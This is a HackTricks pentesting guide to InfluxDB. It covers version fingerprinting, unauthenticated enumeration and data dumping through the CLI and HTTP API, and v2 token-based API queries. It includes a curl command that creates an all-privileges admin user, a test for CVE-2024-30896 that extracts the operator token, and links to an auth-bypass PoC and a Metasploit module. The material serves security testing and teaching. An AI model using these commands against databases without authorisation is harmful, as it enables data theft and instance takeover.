8086-pentesting-influxdb.md (9113B)
1 --- 2 title: "8086 - Pentesting InfluxDB" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/8086-pentesting-influxdb.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/8086-pentesting-influxdb.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 8086 - Pentesting InfluxDB 14 15 ## Basic Information 16 17 **InfluxDB** is an open-source **time series database (TSDB)** developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs provide significant improvements in **storage space** and **performance** for time series datasets. They employ specialized compression algorithms and can be configured to automatically remove old data. Specialized database indices also enhance query performance. 18 19 **Default port**: 8086 20 21 ```text 22 PORT STATE SERVICE VERSION 23 8086/tcp open http InfluxDB http admin 1.7.5 24 ``` 25 26 ## Identify & Version (HTTP) 27 28 - v1.x: `GET /ping` returns status 204 and headers like `X-Influxdb-Version` and `X-Influxdb-Build`. 29 - v2.x+: `GET /health` returns JSON with the server version and status. Works without auth.<sup>[[1]](#references)</sup> 30 31 ```bash 32 # v1 banner grab 33 curl -i http://<host>:8086/ping 34 35 # v2/compat health 36 curl -s http://<host>:8086/health | jq . 37 ``` 38 39 Tip: exposed instances often also serve Prometheus-style metrics at `/metrics`. 40 41 ## Enumeration 42 43 From a pentester point of view this another database that could be storing sensitive information, so it's interesting to know how to dump all the info. 44 45 ### Authentication 46 47 InfluxDB might require authentication or not 48 49 ```bash 50 # Try unauthenticated CLI (v1 shell) 51 influx -host <host> -port 8086 52 > use _internal 53 ``` 54 55 If you **get an error like** this one: `ERR: unable to parse authentication credentials` it means that it's **expecting some credentials**. 56 57 ```text 58 influx –username influx –password influx_pass 59 ``` 60 61 There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)<sup>[[4]](#references)</sup> 62 63 ### Manual Enumeration (v1 HTTP API / InfluxQL) 64 65 Even when no CLI is available, the HTTP API is usually exposed on port 8086. 66 67 ```bash 68 # List databases (unauth) 69 curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES" 70 71 # List retention policies of a DB 72 curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf" 73 74 # List users (if auth disabled) 75 curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS" 76 77 # List measurements (tables) 78 curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS" 79 80 # List field keys (columns) 81 curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS" 82 83 # Dump data from a measurement 84 curl -sG "http://<host>:8086/query" \ 85 --data-urlencode "db=telegraf" \ 86 --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq . 87 88 # Force epoch timestamps (useful for tooling) 89 curl -sG "http://<host>:8086/query" \ 90 --data-urlencode "epoch=ns" \ 91 --data-urlencode "db=telegraf" \ 92 --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' 93 ``` 94 95 > [!WARNING] 96 > In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"` 97 98 If authentication is disabled, you can even create users and escalate: 99 100 ```bash 101 # Create an admin user (v1, auth disabled) 102 curl -sG "http://<host>:8086/query" \ 103 --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES" 104 ``` 105 106 The information of the following CLI example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/).<sup>[[3]](#references)</sup> 107 108 #### Show databases 109 110 The found databases are `telegraf` and `internal` (you will find this one everywhere) 111 112 ```bash 113 > show databases 114 name: databases 115 name 116 ---- 117 telegraf 118 _internal 119 ``` 120 121 #### Show tables/measurements 122 123 The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) explains that **measurements** in InfluxDB can be paralleled with SQL tables. The nomenclature of these **measurements** is indicative of their respective content, each housing data relevant to a particular entity.<sup>[[5]](#references)</sup> 124 125 ```bash 126 > show measurements 127 name: measurements 128 name 129 ---- 130 cpu 131 disk 132 diskio 133 kernel 134 mem 135 processes 136 swap 137 system 138 ``` 139 140 #### Show columns/field keys 141 142 The field keys are like the **columns** of the database 143 144 ```bash 145 > show field keys 146 name: cpu 147 fieldKey fieldType 148 -------- --------- 149 usage_guest float 150 usage_guest_nice float 151 usage_idle float 152 usage_iowait float 153 154 name: disk 155 fieldKey fieldType 156 -------- --------- 157 free integer 158 inodes_free integer 159 inodes_total integer 160 inodes_used integer 161 162 [ ... more keys ...] 163 ``` 164 165 #### Dump Table 166 167 And finally you can **dump the table** doing something like 168 169 ```bash 170 select * from cpu 171 name: cpu 172 time cpu host usage_guest usage_guest_nice usage_idle usage_iowait usage_irq usage_nice usage_softirq usage_steal usage_system usage_user 173 ---- --- ---- ----------- ---------------- ---------- ------------ --------- ---------- ------------- ----------- ------------ ---------- 174 1497018760000000000 cpu-total ubuntu 0 0 99.297893681046 0 0 0 0 0 0.35105315947842414 0.35105315947842414 175 1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101 176 ``` 177 178 ### InfluxDB v2.x API (Token-based) 179 180 InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate: 181 182 ```bash 183 # Basic org, bucket, and auth discovery 184 TOKEN="<token>"; H="-H Authorization: Token $TOKEN" 185 186 # Health & version 187 curl -s http://<host>:8086/health | jq . 188 189 # List organizations 190 curl -s $H http://<host>:8086/api/v2/organizations | jq . 191 192 # List buckets 193 curl -s $H 'http://<host>:8086/api/v2/buckets?limit=100' | jq . 194 195 # List authorizations (requires perms) 196 ORGID=<org_id> 197 curl -s $H "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq . 198 199 # Query data with Flux 200 curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \ 201 -X POST http://<host>:8086/api/v2/query \ 202 --data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)' 203 ``` 204 205 Notes 206 - For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests. 207 - In v2, the HTTP `Authorization` header must be in the form `Token <value>`. 208 209 ### Automated Enumeration 210 211 ```bash 212 msf6 > use auxiliary/scanner/http/influxdb_enum 213 ``` 214 215 ### Recent vulns and privesc of interest (last years) 216 217 - InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org.<sup>[[2]](#references)</sup> Quick test: 218 219 ```bash 220 # Using a low-priv/all-access token tied to the default org 221 curl -s -H 'Authorization: Token <user_or_allAccess_token>' \ 222 'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq . 223 # Look for entries of type "operator" and extract the raw token (if present) 224 ``` 225 226 - Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you. 227 228 229 ## References 230 231 - [1] [InfluxData docs: InfluxDB v1/v2 HTTP API reference (endpoints like `/ping`, `/health`, `/query`, `/api/v2/authorizations`)](https://docs.influxdata.com/influxdb/v1/tools/api/) 232 - [2] [CVE-2024-30896 operator token exposure in InfluxDB OSS 2.x (Wiz)](https://www.wiz.io/vulnerability-database/cve/cve-2024-30896) 233 - [3] [Getting to know InfluxDB (oznetnerd)](https://oznetnerd.com/2017/06/11/getting-know-influxdb/) 234 - [4] [InfluxDB-Exploit-CVE-2019-20933 PoC](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) 235 - [5] [InfluxDB v1.2 Documentation - Getting Started](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/)